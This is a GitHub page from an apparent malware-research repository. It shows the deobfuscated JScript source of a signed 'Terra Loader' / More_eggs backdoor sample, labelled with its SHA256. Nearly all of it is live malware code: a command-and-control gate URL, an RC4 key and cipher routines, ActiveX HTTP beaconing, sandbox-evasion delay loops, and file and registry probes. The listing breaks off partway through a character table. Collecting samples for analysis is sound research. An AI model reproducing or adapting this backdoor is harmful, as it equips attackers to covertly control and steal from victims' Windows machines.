Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Malware-Misc-RE/2019-04-18-Terra Loader - More Eggs Signed Loader.js /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
518 lines (500 sloc)
12.8 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // sample from SHA256: e9a6a275d20b73605c7af7c48140baeff0258b185a315a6beb54d373740a8b14 | |
| // signed malware install loader -> JS Terra Loader aka more_eggs backdoor | |
| // h/t @malwarehunterteam | |
| function anonymous() { | |
| var BV = "6.1"; | |
| var Gate = "https://report.monicabellucci.kz/295693495/info"; | |
| var hit_each = 10; | |
| var error_retry = 2; | |
| var restart_h = 4; | |
| var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each); | |
| var Rkey = "ltgjjhh6iogejlaDKFgdf"; | |
| var rcon_now = 0; | |
| var gtfo = false; | |
| var selfdel = false; | |
| var table = []; | |
| var Build = ""; | |
| var PCN = ""; | |
| var UNM = ""; | |
| var SYSTEM = 0; | |
| var rootK = "HKCU"; | |
| var workingDir = ""; | |
| var main_mitm = ""; | |
| var xApp = ""; | |
| var xTmp = ""; | |
| var PreserveH = ""; | |
| var xStore = ""; | |
| var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"'; | |
| function obj(xString) { | |
| return new ActiveXObject(xString); | |
| } | |
| var con; | |
| try { | |
| con = obj("Msxml2.XMLHTTP.6.0"); | |
| } catch (e) { | |
| try { | |
| con = obj("Msxml2.XMLHTTP.3.0"); | |
| } catch (e2) { | |
| con = obj("Microsoft.XMLHTTP"); | |
| } | |
| } | |
| var xhr; | |
| try { | |
| xhr = obj("Msxml2.ServerXMLHTTP.6.0"); | |
| } catch (e3) { | |
| xhr = obj("Msxml2.ServerXMLHTTP.3.0"); | |
| } | |
| function check_Net(method) { | |
| var Resp = false; | |
| var conz1; | |
| var t11 = ""; | |
| if (method === 1) { | |
| conz1 = xhr; | |
| } else { | |
| conz1 = con; | |
| } | |
| try { | |
| conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false); | |
| } catch (e1) { | |
| if (method === 0) { | |
| return check_Net(1); | |
| } else { | |
| return false; | |
| } | |
| } | |
| conz1.onreadystatechange = function() { | |
| if (conz1.readyState === 4) { | |
| if (conz1.status === 200) { | |
| t11 = conz1.responseText; | |
| if (t11) { | |
| if (t11 == 'This is another XSL namespace\n') { | |
| Resp = true; | |
| } else { | |
| Resp = false; | |
| } | |
| } else { | |
| Resp = false; | |
| } | |
| } else { | |
| Resp = false; | |
| } | |
| } | |
| }; | |
| try { | |
| conz1.send(); | |
| } catch (e2) { | |
| if (method === 0) { | |
| return check_Net(1); | |
| } else { | |
| return false; | |
| } | |
| } | |
| return Resp; | |
| } | |
| function cLength(mstr, min, max) { | |
| var n = mstr.length; | |
| if (n === 0) { | |
| return false; | |
| } | |
| if (n >= min && (n <= max)) { | |
| return true; | |
| } | |
| } | |
| function rInt(min, max) { | |
| min = Math.ceil(min); | |
| max = Math.floor(max); | |
| return Math.floor(Math.random() * (max - min + 1)) + min; | |
| } | |
| function rStr(len) { | |
| var xRnd = ""; | |
| var i; | |
| var randomPoz; | |
| var charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; | |
| i = 0; | |
| do { | |
| randomPoz = Math.floor(Math.random() * charSet.length); | |
| xRnd += charSet.substring(randomPoz, randomPoz + 1); | |
| i += 1; | |
| } while (i < len); | |
| return xRnd; | |
| } | |
| function fuck_js() { | |
| var xNow = rInt(8, 32); | |
| var rNow = rStr(xNow); | |
| try { | |
| xhr.setTimeouts(5000, 5000, 10000, 10000); | |
| xhr.open("GET", "http://8.8.8.8/" + rNow, false); | |
| xhr.send(); | |
| } catch (e9) { | |
| return false; | |
| } | |
| } | |
| function waitfor(zMinute) { | |
| var limit = Date.parse(Date()) + (zMinute * 60000); | |
| while (Date.parse(Date()) < limit) { | |
| fuck_js(); | |
| } | |
| main(); | |
| } | |
| function waitfor2(zMinute, iGo) { | |
| var xlmt; | |
| xlmt = Date.parse(Date()) + (zMinute * 60000); | |
| while (Date.parse(Date()) < xlmt) { | |
| fuck_js(); | |
| } | |
| if (iGo === 1) { | |
| go(); | |
| } | |
| } | |
| function fexist(xpath) { | |
| var fso; | |
| try { | |
| fso = obj("Scripting.FileSystemObject"); | |
| if (fso.FileExists(xpath)) { | |
| return true; | |
| } else { | |
| return false; | |
| } | |
| } catch (feer) { | |
| return false; | |
| } | |
| } | |
| function rexist(xpath) { | |
| var sh; | |
| var rdata; | |
| try { | |
| sh = obj("Wscript.shell"); | |
| rdata = sh.RegRead(xpath); | |
| if (rdata !== null) { | |
| return true; | |
| } | |
| } catch (e71) { | |
| return false; | |
| } | |
| } | |
| function myEnv(xVar, xSystem) { | |
| var a1; | |
| var rEnv; | |
| a1 = obj("WScript.Shell"); | |
| if (xSystem === 1) { | |
| rEnv = a1.environment("SYSTEM"); | |
| } else { | |
| rEnv = a1.environment("PROCESS"); | |
| } | |
| return rEnv(xVar); | |
| } | |
| function myBits() { | |
| var xBits; | |
| xBits = myEnv("PROCESSOR_ARCHITECTURE", 1); | |
| if (xBits === "AMD64") { | |
| return "64"; | |
| } else { | |
| return "86"; | |
| } | |
| } | |
| function zzzz4(key, str) { | |
| var s = []; | |
| var j = 0; | |
| var x; | |
| var res = ""; | |
| var i; | |
| var y; | |
| if (key && str) { | |
| i = 0; | |
| do { | |
| s[i] = i; | |
| i += 1; | |
| } while (i < 256); | |
| i = 0; | |
| do { | |
| j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| i += 1; | |
| } while (i < 256); | |
| i = 0; | |
| j = 0; | |
| y = 0; | |
| do { | |
| i = (i + 1) % 256; | |
| j = (j + s[i]) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]); | |
| y += 1; | |
| } while (y < str.length); | |
| } | |
| return res; | |
| } | |
| function zzz4Bytes(xArray, key) { | |
| var s = []; | |
| var j = 0; | |
| var x; | |
| var outBytes = []; | |
| var i; | |
| var y; | |
| if (key && xArray) { | |
| i = 0; | |
| do { | |
| s[i] = i; | |
| i += 1; | |
| } while (i < 256); | |
| i = 0; | |
| do { | |
| j = (j + s[i] + key.charCodeAt(i % key.length)) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| i += 1; | |
| } while (i < 256); | |
| i = 0; | |
| j = 0; | |
| y = 0; | |
| do { | |
| i = (i + 1) % 256; | |
| j = (j + s[i]) % 256; | |
| x = s[i]; | |
| s[i] = s[j]; | |
| s[j] = x; | |
| outBytes.push(xArray[y] ^ s[(s[i] + s[j]) % 256]); | |
| y += 1; | |
| } while (y < xArray.length); | |
| } | |
| return outBytes; | |
| } | |
| function tB(htc) { | |
| var y = []; | |
| y[0xC7] = 0x80; | |
| y[0xFC] = 0x81; | |
| y[0xE9] = 0x82; | |
| y[0xE2] = 0x83; | |
| y[0xE4] = 0x84; | |
| y[0xE0] = 0x85; | |
| y[0xE5] = 0x86; | |
| y[0xE7] = 0x87; | |
| y[0xEA] = 0x88; | |
| y[0xEB] = 0x89; | |
| y[0xE8] = 0x8A; | |
| y[0xEF] = 0x8B; | |
| y[0xEE] = 0x8C; | |
| y[0xEC] = 0x8D; | |
| y[0xC4] = 0x8E; | |
| y[0xC5] = 0x8F; | |
| y[0xC9] = 0x90; | |
| y[0xE6] = 0x91; | |
| y[0xC6] = 0x92; | |
| y[0xF4] = 0x93; | |
| y[0xF6] = 0x94; | |
| y[0xF2] = 0x95; | |
| y[0xFB] = 0x96; | |
| y[0xF9] = 0x97; | |
| y[0xFF] = 0x98; | |
| y[0xD6] = 0x99; | |
| y[0xDC] = 0x9A; | |
| y[0xA2] = 0x9B; | |
| y[0xA3] = 0x9C; | |
| y[0xA5] = 0x9D; | |
| y[0x20A7] = 0x9E; | |
| y[0x192] = 0x9F; | |
| y[0xE1] = 0xA0; | |
| y[0xED] = 0xA1; | |
| y[0xF3] = 0xA2; | |
| y[0xFA] = 0xA3; | |
| y[0xF1] = 0xA4; | |
| y[0xD1] = 0xA5; | |
| y[0xAA] = 0xA6; | |
| y[0xBA] = 0xA7; | |
| y[0xBF] = 0xA8; | |
| y[0x2310] = 0xA9; | |
| y[0xAC] = 0xAA; | |
| y[0xBD] = 0xAB; | |
| y[0xBC] = 0xAC; | |
| y[0xA1] = 0xAD; | |
| y[0xAB] = 0xAE; | |
| y[0xBB] = 0xAF; | |
| y[0x2591] = 0xB0; | |
| y[0x2592] = 0xB1; | |
| y[0x2593] = 0xB2; | |
| y[0x2502] = 0xB3; | |
| y[0x2524] = 0xB4; | |
| y[0x2561] = 0xB5; | |
| y[0x2562] = 0xB6; | |
| y[0x2556] = 0xB7; | |
| y[0x2555] = 0xB8; | |
| y[0x2563] = 0xB9; | |
| y[0x2551] = 0xBA; | |
| y[0x2557] = 0xBB; | |
| y[0x255D] = 0xBC; | |
| y[0x255C] = 0xBD; | |
| y[0x255B] = 0xBE; | |
| y[0x2510] = 0xBF; | |
| y[0x2514] = 0xC0; | |
| y[0x2534] = 0xC1; | |
| y[0x252C] = 0xC2; | |
| y[0x251C] = 0xC3; | |
| y[0x2500] = 0xC4; | |
| y[0x253C] = 0xC5; | |
| y[0x255E] = 0xC6; | |
| y[0x255F] = 0xC7; | |
| y[0x255A] = 0xC8; | |
| y[0x2554] = 0xC9; | |
| y[0x2569] = 0xCA; | |
| y[0x2566] = 0xCB; | |
| y[0x2560] = 0xCC; | |
| y[0x2550] = 0xCD; | |
| y[0x256C] = 0xCE; | |
| y[0x2567] = 0xCF; | |
| y[0x2568] = 0xD0; | |
| y[0x2564] = 0xD1; | |
| y[0x2565] = 0xD2; | |
| y[0x2559] = 0xD3; | |
| y[0x2558] = 0xD4; | |
| y[0x2552] = 0xD5; | |
| y[0x2553] = 0xD6; | |
| y[0x256B] = 0xD7; | |
| y[0x256A] = 0xD8; | |
| y[0x2518] = 0xD9; | |
| y[0x250C] = 0xDA; | |
| y[0x2588] = 0xDB; | |
| y[0x2584] = 0xDC; | |
| y[0x258C] = 0xDD; | |
| y[0x2590] = 0xDE; | |
| y[0x2580] = 0xDF; | |
| y[0x3B1] = 0xE0; | |
| y[0xDF] = 0xE1; | |
| y[0x393] = 0xE2; | |
| y[0x3C0] = 0xE3; | |
| y[0x3A3] = 0xE4; | |
| y[0x3C3] = 0xE5; | |
| y[0xB5] = 0xE6; | |
| y[0x3C4] = 0xE7; | |
| y[0x3A6] = 0xE8; | |
| y[0x398] = 0xE9; | |
| y[0x3A9] = 0xEA; | |
| y[0x3B4] = 0xEB; | |
| y[0x221E] = 0xEC; | |
| y[0x3C6] = 0xED; | |
| y[0x3B5] = 0xEE; | |
| y[0x2229] = 0xEF; | |
| y[0x2261] = 0xF0; | |
| y[0xB1] = 0xF1; | |
| y[0x2265] = 0xF2; | |
| y[0x2264] = 0xF3; | |
| y[0x2320] = 0xF4; | |
| y[0x2321] = 0xF5; | |
| y[0xF7] = 0xF6; | |
| y[0x2248] = 0xF7; | |
| y[0xB0] = 0xF8; | |
| y[0x2219] = 0xF9; | |
| y[0xB7] = 0xFA; | |
| y[0x221A] = 0xFB; | |
| y[0x207F] = 0xFC; | |
| y[0xB2] = 0xFD; | |
| y[0x25A0] = 0xFE; | |
| y[0xA0] = 0xFF; | |
| var ami = []; | |
| var mi; | |
| var renderer; | |
| var atends; | |
| mi = 0; | |
| do { | |
| renderer = htc.charCodeAt(mi); | |
| if (renderer < 128) { | |
| atends = renderer; | |
| } else { | |
| atends = y[renderer]; | |
| } | |
| ami.push(atends); | |
| mi += 1; | |
| } while (mi < htc.length); | |
| return ami; | |
| } | |
| function tS(arenderer) { | |
| var x = []; | |
| x[0x80] = 0x00C7; | |
| x[0x81] = 0x00FC; | |
| x[0x82] = 0x00E9; | |
| x[0x83] = 0x00E2; | |
| x[0x84] = 0x00E4; | |
| x[0x85] = 0x00E0; | |
| x[0x86] = 0x00E5; | |
| x[0x87] = 0x00E7; | |
| x[0x88] = 0x00EA; | |
| x[0x89] = 0x00EB; | |
| x[0x8A] = 0x00E8; | |
| x[0x8B] = 0x00EF; | |
| x[0x8C] = 0x00EE; | |
| x[0x8D] = 0x00EC; | |
| x[0x8E] = 0x00C4; | |
| x[0x8F] = 0x00C5; | |
| x[0x90] = 0x00C9; | |
| x[0x91] = 0x00E6; | |
| x[0x92] = 0x00C6; | |
| x[0x93] = 0x00F4; | |
| x[0x94] = 0x00F6; | |
| x[0x95] = 0x00F2; | |
| x[0x96] = 0x00FB; | |
| x[0x97] = 0x00F9; | |
| x[0x98] = 0x00FF; | |
| x[0x99] = 0x00D6; | |
| x[0x9A] = 0x00DC; | |
| x[0x9B] = 0x00A2; | |
| x[0x9C] = 0x00A3; | |
| x[0x9D] = 0x00A5; | |
| x[0x9E] = 0x20A7; | |
| x[0x9F] = 0x0192; | |
| x[0xA0] = 0x00E1; | |
| x[0xA1] = 0x00ED; | |
| x[0xA2] = 0x00F3; | |
| x[0xA3] = 0x00FA; | |
| x[0xA4] = 0x00F1; | |
| x[0xA5] = 0x00D1; | |
| x[0xA6] = 0x00AA; | |
| x[0xA7] = 0x00BA; | |
| x[0xA8] = 0x00BF; | |
| x[0xA9] = 0x2310; | |
| x[0xAA] = 0x00AC; | |
| x[0xAB] = 0x00BD; | |
| x[0xAC] = 0x00BC; | |
| x[0xAD] = 0x00A1; | |
| x[0xAE] = 0x00AB; | |
| x[0xAF] = 0x00BB; | |
| x[0xB0] = 0x2591; | |
| x[0xB1] = 0x2592; | |
| x[0xB2] = 0x2593; | |
| x[0xB3] = 0x2502; | |
| x[0xB4] = 0x2524; | |
| x[0xB5] = 0x2561; | |
| x[0xB6] = 0x2562; | |
| x[0xB7] = 0x2556; | |
| x[0xB8] = 0x2555; | |
| x[0xB9] = 0x2563; | |
| x[0xBA] = 0x2551; | |
| x[0xBB] = 0x2557; | |
| x[0xBC] = 0x255D; | |
| x[0xBD] = 0x255C; | |
| x[0xBE] = 0x255B; | |
| x[0xBF] = 0x2510; | |
| x[0xC0] = 0x2514; | |
| x[0xC1] = 0x2534; | |
| x[0xC2] = 0x252C; | |
| x[0xC3] = 0x251C; | |
| x[0xC4] = 0x2500; | |
| x[0xC5] = 0x253C; | |
| x[0xC6] = 0x255E; | |
| x[0xC7] = 0x255F; | |
| x[0xC8] = 0x255A; | |
| x[0xC9] = 0x2554; | |
| x[0xCA] = 0x2569; | |
| x[0xCB] = 0x2566; | |
| x[0xCC] = 0x2560; | |
| x[0xCD] = 0x2550; | |
| x[0xCE] = 0x256C; | |
| x[0xCF] = 0x2567; | |
| x[0xD0] = 0x2568; | |
| x[0xD1] = 0x2564; | |
| x[0xD2] = 0x2565; | |
| ... | |
| /// |